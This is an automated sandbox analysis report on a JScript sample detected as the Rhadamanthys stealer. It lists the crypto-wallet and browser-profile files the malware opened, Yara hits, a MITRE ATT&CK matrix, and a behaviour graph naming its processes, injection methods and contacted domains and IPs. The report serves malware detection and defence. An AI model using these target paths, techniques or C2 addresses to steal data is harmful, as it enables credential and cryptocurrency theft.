                      Source: svchost.exe, 0000001B.00000003.289631562126.0000018CD56DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\ElectronCash\config
                      Source: svchost.exe, 0000001B.00000003.289716143977.0000018CD5627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: y.jaxx
                      Source: svchost.exe, 0000001B.00000003.289714781645.0000018CD56CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                      Source: svchost.exe, 0000001B.00000003.289714781645.0000018CD56CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\Exodus
                      Source: svchost.exe, 0000001B.00000003.289714142333.0000018CD2BFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\Coinomi\Coinomi\wallets
                      Source: powershell.exe, 00000003.00000002.289647160758.0000029A437D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\safebrowsing
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cache2\entries
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\jfrd00o7.default
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\settings\main\ms-language-packs
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\26df2f0d-7481-455a-ad55-489185b726d6
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\settings\main\ms-language-packs\browser\newtab
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\settings\main
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\thumbnails
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cache2\doomed
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\settings
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cache2
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\safebrowsing\google4
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cache2\trash11016
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cache2\trash13043
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnGraphiteCache
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\settings\main\ms-language-packs\browser
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cache2\trash6422
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cache2\trash4312
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\startupCache
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shared Dictionary\cache\index-dir
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\discounts_db
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ClientCertificates
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnWebGPUCache
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cache2\trash19204
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7624, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 00000007.00000002.289414206371.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.289413915589.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.289527976273.0000000003000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.289417352866.00000000054B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.289412154173.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000003.289410202861.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.289410380457.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.289414206371.0000000003453000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.289414109956.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.289418154368.0000000005750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586D6448 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,27_2_00007DF4586D6448

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information22
                      Scripting                      		1
                      Valid Accounts                      		31
                      Windows Management Instrumentation                      		22
                      Scripting                      		1
                      Exploitation for Privilege Escalation                      		1
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services12
                      Archive Collected Data                      		2
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts11
                      Native API                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Deobfuscate/Decode Files or Information                      		21
                      Input Capture                      		1
                      Network Service Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		21
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Exploitation for Client Execution                      		1
                      Create Account                      		1
                      Extra Window Memory Injection                      		4
                      Obfuscated Files or Information                      		Security Account Manager4
                      File and Directory Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts13
                      Command and Scripting Interpreter                      		1
                      Valid Accounts                      		1
                      Valid Accounts                      		1
                      Software Packing                      		NTDS257
                      System Information Discovery                      		Distributed Component Object Model21
                      Input Capture                      		2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts1
                      Scheduled Task/Job                      		14
                      Windows Service                      		11
                      Access Token Manipulation                      		1
                      DLL Side-Loading                      		LSA Secrets671
                      Security Software Discovery                      		SSH2
                      Clipboard Data                      		13
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable Media12
                      Service Execution                      		1
                      Scheduled Task/Job                      		14
                      Windows Service                      		1
                      File Deletion                      		Cached Domain Credentials281
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote Services3
                      PowerShell                      		31
                      Registry Run Keys / Startup Folder                      		712
                      Process Injection                      		1
                      Extra Window Memory Injection                      		DCSync2
                      Process Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job1
                      Scheduled Task/Job                      		1
                      Masquerading                      		Proc Filesystem1
                      Application Window Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAt31
                      Registry Run Keys / Startup Folder                      		1
                      Valid Accounts                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Modify Registry                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd281
                      Virtualization/Sandbox Evasion                      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task11
                      Access Token Manipulation                      		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                      Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers712
                      Process Injection                      		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1640931 Sample: 0a0#U00a0.js Startdate: 17/03/2025 Architecture: WINDOWS Score: 100 87 marchlkalanew6.blogspot.com 2->87 89 kalacpamarchclean.blogspot.com 2->89 91 17 other IPs or domains 2->91 127 Suricata IDS alerts for network traffic 2->127 129 Found malware configuration 2->129 131 Yara detected RHADAMANTHYS Stealer 2->131 133 8 other signatures 2->133 12 wscript.exe 1 2->12         started        15 mshta.exe 2->15         started        17 mshta.exe 2->17         started        19 6 other processes 2->19 signatures3 process4 signatures5 143 JScript performs obfuscated calls to suspicious functions 12->143 145 Wscript starts Powershell (via cmd or directly) 12->145 147 Bypasses PowerShell execution policy 12->147 151 3 other signatures 12->151 21 powershell.exe 16 44 12->21         started        25 SettingSyncHost.exe 12->25         started        149 Suspicious powershell command line found 15->149 27 powershell.exe 15->27         started        29 powershell.exe 17->29         started        31 powershell.exe 19->31         started        process6 dnsIp7 93 blogspot.l.googleusercontent.com 74.125.138.132, 443, 49806, 49807 GOOGLEUS United States 21->93 95 bitbucket.org 104.192.142.25, 443, 49808 AMAZON-AESUS United States 21->95 135 Found many strings related to Crypto-Wallets (likely being stolen) 21->135 137 Creates autostart registry keys with suspicious values (likely registry only malware) 21->137 139 Creates multiple autostart registry keys 21->139 141 4 other signatures 21->141 33 RegSvcs.exe 1 1 21->33         started        35 MSBuild.exe 21->35         started        37 RegSvcs.exe 2 21->37         started        45 5 other processes 21->45 97 64.233.185.132, 443, 49815, 49817 GOOGLEUS United States 27->97 39 conhost.exe 27->39         started        41 conhost.exe 29->41         started        43 conhost.exe 31->43         started        signatures8 process9 process10 47 svchost.exe 33->47         started        51 WerFault.exe 35->51         started        53 WerFault.exe 35->53         started        55 dw20.exe 37->55         started        57 dw20.exe 3 15 45->57         started        59 dw20.exe 45->59         started        dnsIp11 113 185.208.159.170, 2484, 49819, 49834 SIMPLECARRER2IT Switzerland 47->113 115 System process connects to network (likely due to code injection or exploit) 47->115 117 Query firmware table information (likely to detect VMs) 47->117 119 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 47->119 121 4 other signatures 47->121 61 svchost.exe 47->61         started        signatures12 process13 dnsIp14 101 ntp1.net.berkeley.edu 169.229.128.134 UCBUS United States 61->101 103 ntp.time.nl 94.198.159.10 SIDNNL Netherlands 61->103 105 5 other IPs or domains 61->105 153 Early bird code injection technique detected 61->153 155 Found many strings related to Crypto-Wallets (likely being stolen) 61->155 157 Tries to harvest and steal browser information (history, passwords, etc) 61->157 159 2 other signatures 61->159 65 wmlaunch.exe 61->65         started        69 chrome.exe 61->69         started        72 msedge.exe 61->72         started        74 2 other processes 61->74 signatures15 process16 dnsIp17 83 C:\Users\user\AppData\...\goopdate.dll, PE32 65->83 dropped 85 C:\Users\user\...\AvastBrowserUpdate.exe, PE32 65->85 dropped 123 Writes to foreign memory regions 65->123 125 Allocates memory in foreign processes 65->125 76 dllhost.exe 65->76         started        99 239.255.255.250 unknown Reserved 69->99 78 chrome.exe 69->78         started        81 msedge.exe 72->81         started        file18 signatures19 process20 dnsIp21 107 127.0.0.1 unknown unknown 78->107 109 162.159.61.3, 443, 49837, 49840 CLOUDFLARENETUS United States 81->109 111 chrome.cloudflare-dns.com 172.64.41.3, 443, 49835, 49836 CLOUDFLARENETUS United States 81->111

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.